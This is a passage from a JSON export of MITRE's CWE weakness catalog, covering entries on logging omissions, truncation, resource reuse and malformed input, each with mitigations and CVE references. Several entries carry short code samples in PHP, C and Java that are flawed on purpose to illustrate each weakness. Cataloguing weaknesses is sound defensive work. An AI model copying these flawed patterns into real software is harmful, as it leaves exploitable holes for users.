chroot."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation"},{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","System Configuration"],"Description":"Avoid storing information under the FTP root directory."},{"Phase":"System Configuration","Description":"Access control permissions should be set to prevent reading/writing of sensitive files inside/outside of the FTP directory."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Sensitive Data Under FTP Root"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":{"#text":"Sensitive Data Under FTP Root","attr":{"@_Date":"2020-02-24"}}}},"221":{"attr":{"@_ID":"221","@_Name":"Information Loss or Omission","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not record, or improperly records, security-relevant information that leads to an incorrect decision or hampers later analysis.","Extended_Description":"This can be resultant, e.g. a buffer overflow might trigger a crash before the product can log the event.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Information loss or omission"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"81"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"222":{"attr":{"@_ID":"222","@_Name":"Truncation of Security-relevant Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application truncates the display, recording, or processing of security-relevant information in a way that can obscure the source or nature of an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"The source of an attack will be difficult or impossible to determine. This can allow attacks to the system to continue without notice."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0585","Description":"Web browser truncates long sub-domains or paths, facilitating phishing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0585"},{"Reference":"CVE-2004-2032","Description":"Bypass URL filter via a long URL with a large number of trailing hex-encoded space characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2032"},{"Reference":"CVE-2003-0412","Description":"Does not log complete URI of a long request (truncation).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0412"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Truncation of Security-relevant Information"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"223":{"attr":{"@_ID":"223","@_Name":"Omission of Security-relevant Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application does not record or display information that would be important for identifying the source or nature of an attack, or determining if an action is safe.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"The source of an attack will be difficult or impossible to determine. This can allow attacks to the system to continue without notice."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code logs suspicious multiple login attempts.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function login($userName,$password){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(authenticate($userName,$password)){}else{}","xhtml:div":[{"#text":"return True;","attr":{"@_style":"margin-left:10px;"}},{"#text":"incrementLoginAttempts($userName);if(recentLoginAttempts($userName) &gt; 5){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"writeLog(\\"Failed login attempt by User: \\" . $userName . \\" at \\" + date(\'r\') );","attr":{"@_style":"margin-left:10px;"}}}],"xhtml:br":""}}}},"Body_Text":"This code only logs failed login attempts when a certain limit is reached. If an attacker knows this limit, they can stop their attack from being discovered by avoiding the limit."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1029","Description":"Login attempts not recorded if user disconnects before maximum number of tries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1029"},{"Reference":"CVE-2002-1839","Description":"Sender\'s IP address not recorded in outgoing e-mail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1839"},{"Reference":"CVE-2000-0542","Description":"Failed authentication attempt not recorded if later attempt succeeds.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0542"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Omission of Security-relevant Information"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Accountability&#34;, Page 40"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"224":{"attr":{"@_ID":"224","@_Name":"Obscured Security-relevant Information by Alternate Name","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software records security-relevant information according to an alternate name of the affected entity, instead of the canonical name.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Access Control"],"Impact":["Hide Activities","Gain Privileges or Assume Identity"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code prints the contents of a file if a user has permission.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function readFile($filename){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$user = getCurrentUser();$realFile = $filename;if(is_link($filename)){}if(fileowner($realFile) == $user){}else{}","xhtml:br":["","","","","","",""],"xhtml:i":"//resolve file if its a symbolic link","xhtml:div":[{"#text":"$realFile = readlink($filename);","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo file_get_contents($realFile);return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \'Access denied\';writeLog($user . \' attempted to access the file \'. $filename . \' on \'. date(\'r\'));","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"While the code logs a bad access attempt, it logs the user supplied name for the file, not the canonicalized file name. An attacker can obscure their target by giving the script the name of a link to the file they are attempting to access. Also note this code contains a race condition between the is_link() and readlink() functions (CWE-363)."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0725","Description":"Attacker performs malicious actions on a hard link to a file, obscuring the real target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0725"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Obscured Security-relevant Information by Alternate Name"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"225":{"attr":{"@_ID":"225","@_Name":"DEPRECATED: General Information Management Problems","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness can be found at CWE-199.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":{"#text":"DEPRECATED (Duplicate): General Information Management Problems","attr":{"@_Date":"2021-07-20"}}}},"226":{"attr":{"@_ID":"226","@_Name":"Sensitive Information in Resource Not Removed Before Reuse","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product releases a resource such as memory or a file so that it can be made available for reuse, but it does not clear or \\"zeroize\\" the information contained in the resource before the product performs a critical state transition or makes the resource available for reuse by other entities.","Extended_Description":{"xhtml:p":["When resources are released, they can be made available for reuse. For example, after memory is de-allocated, an operating system may make the memory available to another process, or disk space may be reallocated when a file is deleted. As removing information requires time and additional resources, operating systems do not usually clear the previously written information.","Even when the resource is reused by the same process, this weakness can arise when new data is not as large as the old data, which leaves portions of the old data still available. Equivalent errors can occur in other situations where the length of data is variable but the associated data structure is not. If memory is not cleared after use, the information may be read by less trustworthy parties when the memory is reallocated.","This weakness can apply in hardware, such as when a device or system switches between power, sleep, or debug states during normal operation, or when execution changes to different users or privilege levels."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"459","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"212","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"201","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Write a known pattern into each sensitive location. Trigger the release of the resource or cause the desired state transition to occur. Read data back from the sensitive locations. If the reads are successful, and the data is the same as the pattern that was originally written, the test fails and the product needs to be fixed. Note that this test can likely be automated.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"During critical state transitions, information not needed in the next state should be removed or overwritten with fixed patterns (such as all 0\'s) or random data, before the transition to the next state.","Effectiveness":"High"},{"Phase":["Architecture and Design","Implementation"],"Description":"When releasing, de-allocating, or deleting a resource, overwrite its data and relevant metadata with fixed patterns or random data. Be cautious about complex resource types whose underlying representation might be non-contiguous or change at a low level, such as how a file might be split into different chunks on a file system, even though \\"logical\\" file positions are contiguous at the application layer. Such resource types might require invocation of special modes or APIs to tell the underlying operating system to perform the necessary clearing, such as SDelete (Secure Delete) on Windows, although the appropriate functionality might not be available at the application layer.","Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-147"},"Intro_Text":"This example shows how an attacker can take advantage of an incorrect state transition.","Body_Text":[{"xhtml:p":"Suppose a device is transitioning from state A to state B. During state A, it can read certain private keys from the hidden fuses that are only accessible in state A but not in state B. The device reads the keys, performs operations using those keys, then transitions to state B, where those private keys should no longer be accessible."},{"xhtml:p":"After the transition to state B, even though the private keys are no longer accessible directly from the fuses in state B, they can be accessed indirectly by reading the memory that contains the private keys."}],"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:p":"During the transition from A to B, the device does not scrub the memory."},{"#text":"For transition from state A to state B, remove information which should not be available once the transition is complete.","attr":{"@_Nature":"good"}}]},{"attr":{"@_Demonstrative_Example_ID":"DX-148"},"Intro_Text":"The following code calls realloc() on a buffer containing sensitive data:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"cleartext_buffer = get_secret();...cleartext_buffer = realloc(cleartext_buffer, 1024);...scrub_memory(cleartext_buffer, 1024);","xhtml:br":["","",""]}},"Body_Text":"There is an attempt to scrub the sensitive data from memory, but realloc() is used, so it could return a pointer to a different part of memory. The memory that was originally allocated for cleartext_buffer could still contain an uncleared copy of the data."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0001","Description":"Ethernet NIC drivers do not pad frames with null bytes, leading to infoleak from malformed packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0001"},{"Reference":"CVE-2003-0291","Description":"router does not clear information from DHCP packets that have been previously used","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0291"},{"Reference":"CVE-2005-1406","Description":"Products do not fully clear memory buffers when less data is stored into the buffer than previous.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1406"},{"Reference":"CVE-2005-1858","Description":"Products do not fully clear memory buffers when less data is stored into the buffer than previous.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1858"},{"Reference":"CVE-2005-3180","Description":"Products do not fully clear memory buffers when less data is stored into the buffer than previous.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3180"},{"Reference":"CVE-2005-3276","Description":"Product does not clear a data structure before writing to part of it, yielding information leak of previously used memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3276"},{"Reference":"CVE-2002-2077","Description":"Memory not properly cleared before reuse.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2077"}]},"Functional_Areas":{"Functional_Area":["Memory Management","Networking"]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Sensitive Information Uncleared Before Use"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM03-C","Entry_Name":"Clear sensitive information stored in reusable resources returned for reuse"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"Notes":{"Note":[{"#text":"There is a close association between CWE-226 and CWE-212. The difference is partially that of perspective. CWE-226 is geared towards the final stage of the resource lifecycle, in which the resource is deleted, eliminated, expired, or otherwise released for reuse. Technically, this involves a transfer to a different control sphere, in which the original contents of the resource are no longer relevant. CWE-212, however, is intended for sensitive data in resources that are intentionally shared with others, so they are still active. This distinction is useful from the perspective of the CWE research view (CWE-1000).","attr":{"@_Type":"Relationship"}},{"#text":"This entry needs modification to clarify the differences with CWE-212. The description also combines two problems that are distinct from the CWE research perspective: the inadvertent transfer of information to another sphere, and improper initialization/shutdown. Some of the associated taxonomy mappings reflect these different uses.","attr":{"@_Type":"Maintenance"}},{"#text":"This is frequently found for network packets, but it can also exist in local memory allocation, files, etc.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Maintenance_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Functional_Areas, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Name, Relationships, Time_of_Introduction, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Name, Related_Attack_Patterns, Relationships"}],"Previous_Entry_Name":[{"#text":"Sensitive Information Uncleared Before Use","attr":{"@_Date":"2008-04-11"}},{"#text":"Sensitive Information Uncleared Before Release","attr":{"@_Date":"2020-02-24"}},{"#text":"Sensitive Information Uncleared in Resource Before Release for Reuse","attr":{"@_Date":"2020-08-20"}}]}},"228":{"attr":{"@_ID":"228","@_Name":"Improper Handling of Syntactically Invalid Structure","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not handle or incorrectly handles input that is not syntactically well-formed with respect to the associated specification.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)"],"Note":"If an input is syntactically invalid, then processing the input could place the system in an unexpected state that could lead to a crash, consume available system resources or other unintended behaviors."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Structure and Validity Problems"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"}]},"Notes":{"Note":[{"#text":"This entry needs more investigation. Public vulnerability research generally focuses on the manipulations that generate invalid structure, instead of the weaknesses that are exploited by those manipulations. For example, a common attack involves making a request that omits a required field, which can trigger a crash in some cases. The crash could be due to a named chain such as CWE-690 (Unchecked Return Value to NULL Pointer Dereference), but public reports rarely cover this aspect of a vulnerability.","attr":{"@_Type":"Maintenance"}},{"#text":"The validity of input could be roughly classified along \\"syntactic\\", \\"semantic\\", and \\"lexical\\" dimensions. If the specification requires that an input value should be delimited with the \\"[\\" and \\"]\\" square brackets, then any input that does not follow this specification would be syntactically invalid. If the input between the brackets is expected to be a number, but the letters \\"aaa\\" are provided, then the input is syntactically invalid. If the input is a number and enclosed in brackets, but the number is outside of the allowable range, then it is semantically invalid. The inter-relationships between these properties - and their associated weaknesses- need further exploration.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Name, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content 